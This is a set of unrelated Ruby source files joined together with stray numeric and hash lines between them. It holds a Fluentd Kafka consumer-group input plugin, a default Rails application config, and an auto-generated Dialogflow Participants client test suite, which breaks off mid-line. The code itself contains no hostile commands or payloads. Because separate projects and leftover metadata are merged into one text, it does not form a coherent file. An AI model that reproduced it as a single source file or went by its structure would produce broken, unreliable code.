require 'fluent/input' require 'fluent/time' require 'fluent/plugin/kafka_plugin_util' class Fluent::KafkaGroupInput < Fluent::Input Fluent::Plugin.register_input('kafka_group', self) config_param :brokers, :string, :default => 'localhost:9092', :desc => "List of broker-host:port, separate with comma, must set." config_param :consumer_group, :string, :desc => "Consumer group name, must set." config_param :topics, :string, :desc => "Listening topics(separate with comma',')." config_param :client_id, :string, :default => 'kafka' config_param :sasl_over_ssl, :bool, :default => true, :desc => "Set to false to prevent SSL strict mode when using SASL authentication" config_param :format, :string, :default => 'json', :desc => "Supported format: (json|text|ltsv|msgpack)" config_param :message_key, :string, :default => 'message', :desc => "For 'text' format only." config_param :add_headers, :bool, :default => false, :desc => "Add kafka's message headers to event record" config_param :add_prefix, :string, :default => nil, :desc => "Tag prefix (Optional)" config_param :add_suffix, :string, :default => nil, :desc => "Tag suffix (Optional)" config_param :retry_emit_limit, :integer, :default => nil, :desc => "How long to stop event consuming when BufferQueueLimitError happens. Wait retry_emit_limit x 1s. The default is waiting until BufferQueueLimitError is resolved" config_param :use_record_time, :bool, :default => false, :desc => "Replace message timestamp with contents of 'time' field.", :deprecated => "Use 'time_source record' instead." config_param :time_source, :enum, :list => [:now, :kafka, :record], :default => :now, :desc => "Source for message timestamp." config_param :record_time_key, :string, :default => 'time', :desc => "Time field when time_source is 'record'" config_param :get_kafka_client_log, :bool, :default => false config_param :time_format, :string, :default => nil, :desc => "Time format to be used to parse 'time' field." config_param :tag_source, :enum, :list => [:topic, :record], :default => :topic, :desc => "Source for the fluentd event tag" config_param :record_tag_key, :string, :default => 'tag', :desc => "Tag field when tag_source is 'record'" config_param :kafka_message_key, :string, :default => nil, :desc => "Set kafka's message key to this field" config_param :connect_timeout, :integer, :default => nil, :desc => "[Integer, nil] the timeout setting for connecting to brokers" config_param :socket_timeout, :integer, :default => nil, :desc => "[Integer, nil] the timeout setting for socket connection" config_param :retry_wait_seconds, :integer, :default => 30 config_param :disable_retry_limit, :bool, :default => false, :desc => "If set true, it disables retry_limit and make Fluentd retry indefinitely (default: false)" config_param :retry_limit, :integer, :default => 10, :desc => "The maximum number of retries for connecting kafka (default: 10)" # Kafka consumer options config_param :max_bytes, :integer, :default => 1048576, :desc => "Maximum number of bytes to fetch." config_param :max_wait_time, :integer, :default => nil, :desc => "How long to block until the server sends us data." config_param :min_bytes, :integer, :default => nil, :desc => "Smallest amount of data the server should send us." config_param :session_timeout, :integer, :default => nil, :desc => "The number of seconds after which, if a client hasn't contacted the Kafka cluster" config_param :offset_commit_interval, :integer, :default => nil, :desc => "The interval between offset commits, in seconds" config_param :offset_commit_threshold, :integer, :default => nil, :desc => "The number of messages that can be processed before their offsets are committed" config_param :fetcher_max_queue_size, :integer, :default => nil, :desc => "The number of fetched messages per partition that are queued in fetcher queue" config_param :start_from_beginning, :bool, :default => true, :desc => "Whether to start from the beginning of the topic or just subscribe to new messages being produced" include Fluent::KafkaPluginUtil::SSLSettings include Fluent::KafkaPluginUtil::SaslSettings class ForShutdown < StandardError end BufferError = if defined?(Fluent::Plugin::Buffer::BufferOverflowError) Fluent::Plugin::Buffer::BufferOverflowError else Fluent::BufferQueueLimitError end unless method_defined?(:router) define_method("router") { Fluent::Engine } end def initialize super require 'kafka' @time_parser = nil @retry_count = 1 end def _config_to_array(config) config_array = config.split(',').map {|k| k.strip } if config_array.empty? raise Fluent::ConfigError, "kafka_group: '#{config}' is a required parameter" end config_array end def multi_workers_ready? true end private :_config_to_array def configure(conf) super $log.info "Will watch for topics #{@topics} at brokers " \ "#{@brokers} and '#{@consumer_group}' group" @topics = _config_to_array(@topics) if conf['max_wait_ms'] log.warn "'max_wait_ms' parameter is deprecated. Use second unit 'max_wait_time' instead" @max_wait_time = conf['max_wait_ms'].to_i / 1000 end @parser_proc = setup_parser(conf) @consumer_opts = {:group_id => @consumer_group} @consumer_opts[:session_timeout] = @session_timeout if @session_timeout @consumer_opts[:offset_commit_interval] = @offset_commit_interval if @offset_commit_interval @consumer_opts[:offset_commit_threshold] = @offset_commit_threshold if @offset_commit_threshold @consumer_opts[:fetcher_max_queue_size] = @fetcher_max_queue_size if @fetcher_max_queue_size @fetch_opts = {} @fetch_opts[:max_wait_time] = @max_wait_time if @max_wait_time @fetch_opts[:min_bytes] = @min_bytes if @min_bytes @time_source = :record if @use_record_time if @time_source == :record and @time_format if defined?(Fluent::TimeParser) @time_parser = Fluent::TimeParser.new(@time_format) else @time_parser = Fluent::TextParser::TimeParser.new(@time_format) end end if @time_source == :record && defined?(Fluent::NumericTimeParser) @float_numeric_parse = Fluent::NumericTimeParser.new(:float) end end def setup_parser(conf) case @format when 'json' begin require 'oj' Oj.default_options = Fluent::DEFAULT_OJ_OPTIONS Proc.new { |msg| Oj.load(msg.value) } rescue LoadError require 'yajl' Proc.new { |msg| Yajl::Parser.parse(msg.value) } end when 'ltsv' require 'ltsv' Proc.new { |msg| LTSV.parse(msg.value, {:symbolize_keys => false}).first } when 'msgpack' require 'msgpack' Proc.new { |msg| MessagePack.unpack(msg.value) } when 'text' Proc.new { |msg| {@message_key => msg.value} } else @custom_parser = Fluent::Plugin.new_parser(conf['format']) @custom_parser.configure(conf) Proc.new { |msg| @custom_parser.parse(msg.value) {|_time, record| record } } end end def start super logger = @get_kafka_client_log ? log : nil if @scram_mechanism != nil && @username != nil && @password != nil @kafka = Kafka.new(seed_brokers: @brokers, client_id: @client_id, logger: logger, connect_timeout: @connect_timeout, socket_timeout: @socket_timeout, ssl_ca_cert: read_ssl_file(@ssl_ca_cert), ssl_client_cert: read_ssl_file(@ssl_client_cert), ssl_client_cert_key: read_ssl_file(@ssl_client_cert_key), ssl_ca_certs_from_system: @ssl_ca_certs_from_system, sasl_scram_username: @username, sasl_scram_password: @password, sasl_scram_mechanism: @scram_mechanism, sasl_over_ssl: @sasl_over_ssl, ssl_verify_hostname: @ssl_verify_hostname) elsif @username != nil && @password != nil @kafka = Kafka.new(seed_brokers: @brokers, client_id: @client_id, logger: logger, connect_timeout: @connect_timeout, socket_timeout: @socket_timeout, ssl_ca_cert: read_ssl_file(@ssl_ca_cert), ssl_client_cert: read_ssl_file(@ssl_client_cert), ssl_client_cert_key: read_ssl_file(@ssl_client_cert_key), ssl_ca_certs_from_system: @ssl_ca_certs_from_system, sasl_plain_username: @username, sasl_plain_password: @password, sasl_over_ssl: @sasl_over_ssl, ssl_verify_hostname: @ssl_verify_hostname) else @kafka = Kafka.new(seed_brokers: @brokers, client_id: @client_id, logger: logger, connect_timeout: @connect_timeout, socket_timeout: @socket_timeout, ssl_ca_cert: read_ssl_file(@ssl_ca_cert), ssl_client_cert: read_ssl_file(@ssl_client_cert), ssl_client_cert_key: read_ssl_file(@ssl_client_cert_key), ssl_ca_certs_from_system: @ssl_ca_certs_from_system, sasl_gssapi_principal: @principal, sasl_gssapi_keytab: @keytab, ssl_verify_hostname: @ssl_verify_hostname) end @consumer = setup_consumer @thread = Thread.new(&method(:run)) end def shutdown # This nil assignment should be guarded by mutex in multithread programming manner. # But the situation is very low contention, so we don't use mutex for now. # If the problem happens, we will add a guard for consumer. consumer = @consumer @consumer = nil consumer.stop @thread.join @kafka.close super end def setup_consumer consumer = @kafka.consumer(@consumer_opts) @topics.each { |topic| if m = /^\/(.+)\/$/.match(topic) topic_or_regex = Regexp.new(m[1]) $log.info "Subscribe to topics matching the regex #{topic}" else topic_or_regex = topic $log.info "Subscribe to topic #{topic}" end consumer.subscribe(topic_or_regex, start_from_beginning: @start_from_beginning, max_bytes_per_partition: @max_bytes) } consumer end def reconnect_consumer log.warn "Stopping Consumer" consumer = @consumer @consumer = nil if consumer consumer.stop end log.warn "Could not connect to broker. retry_time:#{@retry_count}. Next retry will be in #{@retry_wait_seconds} seconds" @retry_count = @retry_count + 1 sleep @retry_wait_seconds @consumer = setup_consumer log.warn "Re-starting consumer #{Time.now.to_s}" @retry_count = 0 rescue =>e log.error "unexpected error during re-starting consumer object access", :error => e.to_s log.error_backtrace if @retry_count <= @retry_limit or disable_retry_limit reconnect_consumer end end def process_batch_with_record_tag(batch) es = {} batch.messages.each { |msg| begin record = @parser_proc.call(msg) tag = record[@record_tag_key] tag = @add_prefix + "." + tag if @add_prefix tag = tag + "." + @add_suffix if @add_suffix es[tag] ||= Fluent::MultiEventStream.new case @time_source when :kafka record_time = Fluent::EventTime.from_time(msg.create_time) when :now record_time = Fluent::Engine.now when :record if @time_format record_time = @time_parser.parse(record[@record_time_key].to_s) else record_time = record[@record_time_key] end else log.fatal "BUG: invalid time_source: #{@time_source}" end if @kafka_message_key record[@kafka_message_key] = msg.key end if @add_headers msg.headers.each_pair { |k, v| record[k] = v } end es[tag].add(record_time, record) rescue => e log.warn "parser error in #{batch.topic}/#{batch.partition}", :error => e.to_s, :value => msg.value, :offset => msg.offset log.debug_backtrace end } unless es.empty? es.each { |tag,es| emit_events(tag, es) } end end def process_batch(batch) es = Fluent::MultiEventStream.new tag = batch.topic tag = @add_prefix + "." + tag if @add_prefix tag = tag + "." + @add_suffix if @add_suffix batch.messages.each { |msg| begin record = @parser_proc.call(msg) case @time_source when :kafka record_time = Fluent::EventTime.from_time(msg.create_time) when :now record_time = Fluent::Engine.now when :record record_time = record[@record_time_key] if @time_format record_time = @time_parser.parse(record_time.to_s) elsif record_time.is_a?(Float) && @float_numeric_parse record_time = @float_numeric_parse.parse(record_time) end else log.fatal "BUG: invalid time_source: #{@time_source}" end if @kafka_message_key record[@kafka_message_key] = msg.key end if @add_headers msg.headers.each_pair { |k, v| record[k] = v } end es.add(record_time, record) rescue => e log.warn "parser error in #{batch.topic}/#{batch.partition}", :error => e.to_s, :value => msg.value, :offset => msg.offset log.debug_backtrace end } unless es.empty? emit_events(tag, es) end end def run while @consumer begin @consumer.each_batch(@fetch_opts) { |batch| if @tag_source == :record process_batch_with_record_tag(batch) else process_batch(batch) end } rescue ForShutdown rescue => e log.error "unexpected error during consuming events from kafka. Re-fetch events.", :error => e.to_s log.error_backtrace reconnect_consumer end end rescue => e log.error "unexpected error during consumer object access", :error => e.to_s log.error_backtrace end def emit_events(tag, es) retries = 0 begin router.emit_stream(tag, es) rescue BufferError raise ForShutdown if @consumer.nil? if @retry_emit_limit.nil? sleep 1 retry end if retries < @retry_emit_limit retries += 1 sleep 1 retry else raise RuntimeError, "Exceeds retry_emit_limit" end end end end
38.264781
197
0.645348
bf43be3f328dbbf76c126ae8303d27582d25af31
1,119
require File.expand_path('../boot', __FILE__) require 'rails/all' # Require the gems listed in Gemfile, including any gems # you've limited to :test, :development, or :production. Bundler.require(*Rails.groups) module Topicsources class Application < Rails::Application # Settings in config/environments/* take precedence over those specified here. # Application configuration should go into files in config/initializers # -- all .rb files in that directory are automatically loaded. # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone. # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC. # config.time_zone = 'Central Time (US & Canada)' # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded. # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s] # config.i18n.default_locale = :de # Do not swallow errors in after_commit/after_rollback callbacks. config.active_record.raise_in_transactional_callbacks = true end end
41.444444
99
0.734584
ab367dc14bdd9affac7a0fc77b9ba077e566ac23
30,647
# frozen_string_literal: true # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Auto-generated by gapic-generator-ruby. DO NOT EDIT! require "helper" require "gapic/grpc/service_stub" require "google/cloud/dialogflow/v2beta1/participant_pb" require "google/cloud/dialogflow/v2beta1/participant_services_pb" require "google/cloud/dialogflow/v2beta1/participants" class ::Google::Cloud::Dialogflow::V2beta1::Participants::ClientTest < Minitest::Test class ClientStub attr_accessor :call_rpc_count, :requests def initialize response, operation, &block @response = response @operation = operation @block = block @call_rpc_count = 0 @requests = [] end def call_rpc *args, **kwargs @call_rpc_count += 1 @requests << @block&.call(*args, **kwargs) yield @response, @operation if block_given? @response end end def test_create_participant # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::Participant.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. parent = "hello world" participant = {} create_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :create_participant, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::CreateParticipantRequest, request assert_equal "hello world", request["parent"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::Participant), request["participant"] refute_nil options end Gapic::ServiceStub.stub :new, create_participant_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.create_participant({ parent: parent, participant: participant }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.create_participant parent: parent, participant: participant do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.create_participant ::Google::Cloud::Dialogflow::V2beta1::CreateParticipantRequest.new(parent: parent, participant: participant) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.create_participant({ parent: parent, participant: participant }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.create_participant(::Google::Cloud::Dialogflow::V2beta1::CreateParticipantRequest.new(parent: parent, participant: participant), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, create_participant_client_stub.call_rpc_count end end def test_get_participant # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::Participant.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. name = "hello world" get_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :get_participant, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::GetParticipantRequest, request assert_equal "hello world", request["name"] refute_nil options end Gapic::ServiceStub.stub :new, get_participant_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.get_participant({ name: name }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.get_participant name: name do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.get_participant ::Google::Cloud::Dialogflow::V2beta1::GetParticipantRequest.new(name: name) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.get_participant({ name: name }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.get_participant(::Google::Cloud::Dialogflow::V2beta1::GetParticipantRequest.new(name: name), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, get_participant_client_stub.call_rpc_count end end def test_list_participants # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::ListParticipantsResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. parent = "hello world" page_size = 42 page_token = "hello world" list_participants_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :list_participants, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::ListParticipantsRequest, request assert_equal "hello world", request["parent"] assert_equal 42, request["page_size"] assert_equal "hello world", request["page_token"] refute_nil options end Gapic::ServiceStub.stub :new, list_participants_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.list_participants({ parent: parent, page_size: page_size, page_token: page_token }) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use named arguments client.list_participants parent: parent, page_size: page_size, page_token: page_token do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use protobuf object client.list_participants ::Google::Cloud::Dialogflow::V2beta1::ListParticipantsRequest.new(parent: parent, page_size: page_size, page_token: page_token) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use hash object with options client.list_participants({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use protobuf object with options client.list_participants(::Google::Cloud::Dialogflow::V2beta1::ListParticipantsRequest.new(parent: parent, page_size: page_size, page_token: page_token), grpc_options) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, list_participants_client_stub.call_rpc_count end end def test_update_participant # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::Participant.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. participant = {} update_mask = {} update_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :update_participant, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::UpdateParticipantRequest, request assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::Participant), request["participant"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Protobuf::FieldMask), request["update_mask"] refute_nil options end Gapic::ServiceStub.stub :new, update_participant_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.update_participant({ participant: participant, update_mask: update_mask }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.update_participant participant: participant, update_mask: update_mask do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.update_participant ::Google::Cloud::Dialogflow::V2beta1::UpdateParticipantRequest.new(participant: participant, update_mask: update_mask) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.update_participant({ participant: participant, update_mask: update_mask }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.update_participant(::Google::Cloud::Dialogflow::V2beta1::UpdateParticipantRequest.new(participant: participant, update_mask: update_mask), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, update_participant_client_stub.call_rpc_count end end def test_analyze_content # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::AnalyzeContentResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. participant = "hello world" text_input = {} reply_audio_config = {} query_params = {} message_send_time = {} request_id = "hello world" analyze_content_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :analyze_content, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::AnalyzeContentRequest, request assert_equal "hello world", request["participant"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::TextInput), request["text_input"] assert_equal :text_input, request.input assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::OutputAudioConfig), request["reply_audio_config"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::QueryParameters), request["query_params"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Protobuf::Timestamp), request["message_send_time"] assert_equal "hello world", request["request_id"] refute_nil options end Gapic::ServiceStub.stub :new, analyze_content_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.analyze_content({ participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.analyze_content participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.analyze_content ::Google::Cloud::Dialogflow::V2beta1::AnalyzeContentRequest.new(participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.analyze_content({ participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.analyze_content(::Google::Cloud::Dialogflow::V2beta1::AnalyzeContentRequest.new(participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, analyze_content_client_stub.call_rpc_count end end def test_suggest_articles # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::SuggestArticlesResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. parent = "hello world" latest_message = "hello world" context_size = 42 suggest_articles_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :suggest_articles, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::SuggestArticlesRequest, request assert_equal "hello world", request["parent"] assert_equal "hello world", request["latest_message"] assert_equal 42, request["context_size"] refute_nil options end Gapic::ServiceStub.stub :new, suggest_articles_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.suggest_articles({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.suggest_articles parent: parent, latest_message: latest_message, context_size: context_size do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.suggest_articles ::Google::Cloud::Dialogflow::V2beta1::SuggestArticlesRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.suggest_articles({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.suggest_articles(::Google::Cloud::Dialogflow::V2beta1::SuggestArticlesRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, suggest_articles_client_stub.call_rpc_count end end def test_suggest_faq_answers # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::SuggestFaqAnswersResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. parent = "hello world" latest_message = "hello world" context_size = 42 suggest_faq_answers_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :suggest_faq_answers, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::SuggestFaqAnswersRequest, request assert_equal "hello world", request["parent"] assert_equal "hello world", request["latest_message"] assert_equal 42, request["context_size"] refute_nil options end Gapic::ServiceStub.stub :new, suggest_faq_answers_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.suggest_faq_answers({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.suggest_faq_answers parent: parent, latest_message: latest_message, context_size: context_size do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.suggest_faq_answers ::Google::Cloud::Dialogflow::V2beta1::SuggestFaqAnswersRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.suggest_faq_answers({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.suggest_faq_answers(::Google::Cloud::Dialogflow::V2beta1::SuggestFaqAnswersRequest.new(parent: parent, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, suggest_faq_answers_client_stub.call_rpc_count end end def test_suggest_smart_replies # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::SuggestSmartRepliesResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. parent = "hello world" current_text_input = {} latest_message = "hello world" context_size = 42 suggest_smart_replies_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :suggest_smart_replies, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::SuggestSmartRepliesRequest, request assert_equal "hello world", request["parent"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::TextInput), request["current_text_input"] assert_equal "hello world", request["latest_message"] assert_equal 42, request["context_size"] refute_nil options end Gapic::ServiceStub.stub :new, suggest_smart_replies_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.suggest_smart_replies({ parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.suggest_smart_replies parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.suggest_smart_replies ::Google::Cloud::Dialogflow::V2beta1::SuggestSmartRepliesRequest.new(parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.suggest_smart_replies({ parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.suggest_smart_replies(::Google::Cloud::Dialogflow::V2beta1::SuggestSmartRepliesRequest.new(parent: parent, current_text_input: current_text_input, latest_message: latest_message, context_size: context_size), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, suggest_smart_replies_client_stub.call_rpc_count end end def test_list_suggestions # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::ListSuggestionsResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. parent = "hello world" page_size = 42 page_token = "hello world" filter = "hello world" list_suggestions_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :list_suggestions, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::ListSuggestionsRequest, request assert_equal "hello world", request["parent"] assert_equal 42, request["page_size"] assert_equal "hello world", request["page_token"] assert_equal "hello world", request["filter"] refute_nil options end Gapic::ServiceStub.stub :new, list_suggestions_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.list_suggestions({ parent: parent, page_size: page_size, page_token: page_token, filter: filter }) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use named arguments client.list_suggestions parent: parent, page_size: page_size, page_token: page_token, filter: filter do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use protobuf object client.list_suggestions ::Google::Cloud::Dialogflow::V2beta1::ListSuggestionsRequest.new(parent: parent, page_size: page_size, page_token: page_token, filter: filter) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use hash object with options client.list_suggestions({ parent: parent, page_size: page_size, page_token: page_token, filter: filter }, grpc_options) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use protobuf object with options client.list_suggestions(::Google::Cloud::Dialogflow::V2beta1::ListSuggestionsRequest.new(parent: parent, page_size: page_size, page_token: page_token, filter: filter), grpc_options) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, list_suggestions_client_stub.call_rpc_count end end def test_compile_suggestion # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::CompileSuggestionResponse.new grpc_operation 